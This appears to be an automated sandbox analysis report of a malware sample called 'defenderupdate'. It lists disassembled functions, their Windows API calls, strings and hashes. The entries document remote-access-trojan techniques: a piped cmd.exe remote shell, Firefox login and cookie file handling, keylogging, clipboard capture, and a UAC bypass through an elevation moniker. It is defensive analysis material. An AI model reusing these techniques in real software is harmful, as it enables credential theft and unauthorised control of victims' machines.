                                                                                                • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                                                                • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(?,?,0044252A,?), ref: 00442575
                                                                                                • TerminateProcess.KERNEL32(00000000,?,0044252A,?), ref: 0044257C
                                                                                                • ExitProcess.KERNEL32 ref: 0044258E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                • String ID:
                                                                                                • API String ID: 1703294689-0
                                                                                                • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                                                                • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,00475B70,?,?,00000000,00475B70,004017F3), ref: 004047FD
                                                                                                • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404808
                                                                                                • CloseHandle.KERNELBASE(?,?,?,00000000,00475B70,004017F3), ref: 00404811
                                                                                                • closesocket.WS2_32(?), ref: 0040481F
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 00404856
                                                                                                • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404867
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 0040486E
                                                                                                • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404880
                                                                                                • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404885
                                                                                                • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 0040488A
                                                                                                • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404895
                                                                                                • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 0040489A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                • String ID:
                                                                                                • API String ID: 3658366068-0
                                                                                                • Opcode ID: 064d6b1f915996a70041b40538a6eeea030a706771223880b65586d948e925f6
                                                                                                • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                                                                • Opcode Fuzzy Hash: 064d6b1f915996a70041b40538a6eeea030a706771223880b65586d948e925f6
                                                                                                • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 22 447210-447224 23 447226-44722f 22->23 24 447231-44724c LoadLibraryExW 22->24 27 447288-44728a 23->27 25 447275-44727b 24->25 26 44724e-447257 GetLastError 24->26 30 447284 25->30 31 44727d-44727e FreeLibrary 25->31 28 447266 26->28 29 447259-447264 LoadLibraryExW 26->29 32 447268-44726a 28->32 29->32 33 447286-447287 30->33 31->30 32->25 34 44726c-447273 32->34 33->27 34->33
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                                                                • GetLastError.KERNEL32(?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 3177248105-0
                                                                                                • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                                                                • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 35 40bed7-40bf03 call 401e8f CreateMutexA GetLastError
                                                                                                APIs
                                                                                                • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                                                • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateErrorLastMutex
                                                                                                • String ID: (CG
                                                                                                • API String ID: 1925916568-4210230975
                                                                                                • Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                                                                • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                                                                • Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                                                                • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 46 447174-44719e 47 4471a0-4471a2 46->47 48 447209 46->48 49 4471a4-4471a6 47->49 50 4471a8-4471ae 47->50 51 44720b-44720f 48->51 49->51 52 4471b0-4471b2 call 447210 50->52 53 4471ca 50->53 56 4471b7-4471ba 52->56 55 4471cc-4471ce 53->55 57 4471d0-4471de GetProcAddress 55->57 58 4471f9-447207 55->58 59 4471bc-4471c2 56->59 60 4471eb-4471f1 56->60 61 4471e0-4471e9 call 4333a7 57->61 62 4471f3 57->62 58->48 59->52 63 4471c4 59->63 60->55 61->49 62->58 63->53
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004471D4
                                                                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004471E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                • String ID:
                                                                                                • API String ID: 2279764990-0
                                                                                                • Opcode ID: d60c3e2bfe9cc093b3110c1e14b53e816b2a5bac2969881e56f7ec686a65f544
                                                                                                • Instruction ID: 6f7a2b722a2a1d8c8194c8cb68bd8fc2eac5a8381c6f9e3e6965fab01942ac9c
                                                                                                • Opcode Fuzzy Hash: d60c3e2bfe9cc093b3110c1e14b53e816b2a5bac2969881e56f7ec686a65f544
                                                                                                • Instruction Fuzzy Hash: 8A110233A041629BFB329F68EC4099B7395AB803747164672FD19AB344DB34EC4386E9

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                                                                  • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,1DC,?,00475B70,00473D54,00000000,?,?,?,?,00434431,?,0046D680,?), ref: 00437C37
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                                • String ID:
                                                                                                • API String ID: 3476068407-0
                                                                                                • Opcode ID: 0c813f605dd2a6606fe246f0cee3a0605bca7c2744777b4a7d98c309a0a34cf7
                                                                                                • Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
                                                                                                • Opcode Fuzzy Hash: 0c813f605dd2a6606fe246f0cee3a0605bca7c2744777b4a7d98c309a0a34cf7
                                                                                                • Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 86 446aff-446b0b 87 446b3d-446b48 call 445354 86->87 88 446b0d-446b0f 86->88 96 446b4a-446b4c 87->96 89 446b11-446b12 88->89 90 446b28-446b39 RtlAllocateHeap 88->90 89->90 92 446b14-446b1b call 4447c5 90->92 93 446b3b 90->93 92->87 98 446b1d-446b26 call 442200 92->98 93->96 98->87 98->90
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                                                                • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                                                                • Opcode Fuzzy Hash: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                                                                • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
                                                                                                APIs
                                                                                                • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                                  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                                                                  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                                • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                                                                • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                                                                  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                                                                  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                                                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                                  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                                • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                                • CloseHandle.KERNEL32 ref: 004053CD
                                                                                                • CloseHandle.KERNEL32 ref: 004053D5
                                                                                                • CloseHandle.KERNEL32 ref: 004053E7
                                                                                                • CloseHandle.KERNEL32 ref: 004053EF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                                                                • API String ID: 3815868655-81343324
                                                                                                • Opcode ID: bfcb8ec680749e1ff3d96b83f6722c7489f5814a8e376730b38478a1694e7e9c
                                                                                                • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                                                                • Opcode Fuzzy Hash: bfcb8ec680749e1ff3d96b83f6722c7489f5814a8e376730b38478a1694e7e9c
                                                                                                • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                                                                APIs
                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$CloseFile$FirstNext
                                                                                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                • API String ID: 1164774033-3681987949
                                                                                                • Opcode ID: 012abd7bd482f24294ec220c5f3416e7c12077f4aefc2c6d47742caa5bc96ad8
                                                                                                • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                                                                • Opcode Fuzzy Hash: 012abd7bd482f24294ec220c5f3416e7c12077f4aefc2c6d47742caa5bc96ad8
                                                                                                • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                                APIs
                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$Close$File$FirstNext
                                                                                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                • API String ID: 3527384056-432212279
                                                                                                • Opcode ID: eec28e5122cf95747afd0231d26089d1190572cbd646818cfb2ab67d48c7021b
                                                                                                • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                                                                • Opcode Fuzzy Hash: eec28e5122cf95747afd0231d26089d1190572cbd646818cfb2ab67d48c7021b
                                                                                                • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                                  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                  • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                                • API String ID: 726551946-3025026198
                                                                                                • Opcode ID: 2298112d5e9beca4c64cadb89c7e546d0899f31810f4b1b50fdabc55d78eae7e
                                                                                                • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                                                                • Opcode Fuzzy Hash: 2298112d5e9beca4c64cadb89c7e546d0899f31810f4b1b50fdabc55d78eae7e
                                                                                                • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                                                                APIs
                                                                                                • OpenClipboard.USER32 ref: 004159C7
                                                                                                • EmptyClipboard.USER32 ref: 004159D5
                                                                                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                                • CloseClipboard.USER32 ref: 00415A5A
                                                                                                • OpenClipboard.USER32 ref: 00415A61
                                                                                                • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                • CloseClipboard.USER32 ref: 00415A89
                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                • String ID:
                                                                                                • API String ID: 3520204547-0
                                                                                                • Opcode ID: 5bf6c0a188ebc9cd77caef7c6d8a55023eea9b799c8747cd0bf31199529283f8
                                                                                                • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                                                                • Opcode Fuzzy Hash: 5bf6c0a188ebc9cd77caef7c6d8a55023eea9b799c8747cd0bf31199529283f8
                                                                                                • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0$1$2$3$4$5$6$7
                                                                                                • API String ID: 0-3177665633
                                                                                                • Opcode ID: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                                                                • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                                                                • Opcode Fuzzy Hash: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                                                                • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                                                                APIs
                                                                                                • GetForegroundWindow.USER32 ref: 00409B3F
                                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                • GetKeyboardState.USER32(?), ref: 00409B67
                                                                                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                • String ID: 8[G
                                                                                                • API String ID: 1888522110-1691237782
                                                                                                • Opcode ID: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                                                                • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                                                                • Opcode Fuzzy Hash: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                                                                • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                                                                APIs
                                                                                                • _wcslen.LIBCMT ref: 00406788
                                                                                                • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Object_wcslen
                                                                                                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                • API String ID: 240030777-3166923314
                                                                                                • Opcode ID: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                                                                • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                                                                • Opcode Fuzzy Hash: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                                                                • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                                                                APIs
                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                                                                • GetLastError.KERNEL32 ref: 00419935
                                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                • String ID:
                                                                                                • API String ID: 3587775597-0
                                                                                                • Opcode ID: 46cfc2a1174990e4b59b9ee5729c715e61cf9958b22909a5f2789daa8df81af0
                                                                                                • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                                                                • Opcode Fuzzy Hash: 46cfc2a1174990e4b59b9ee5729c715e61cf9958b22909a5f2789daa8df81af0
                                                                                                • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B489
                                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4BB
                                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B529
                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B536
                                                                                                  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B50C
                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B561
                                                                                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B568
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00473EE8,00000000), ref: 0041B570
                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B583
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                • String ID:
                                                                                                • API String ID: 2341273852-0
                                                                                                • Opcode ID: 38605e05b284b3287545d71b9912fe11a1e5e192bb535f2a18b99cb8ec032d5d
                                                                                                • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                                                                • Opcode Fuzzy Hash: 38605e05b284b3287545d71b9912fe11a1e5e192bb535f2a18b99cb8ec032d5d
                                                                                                • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
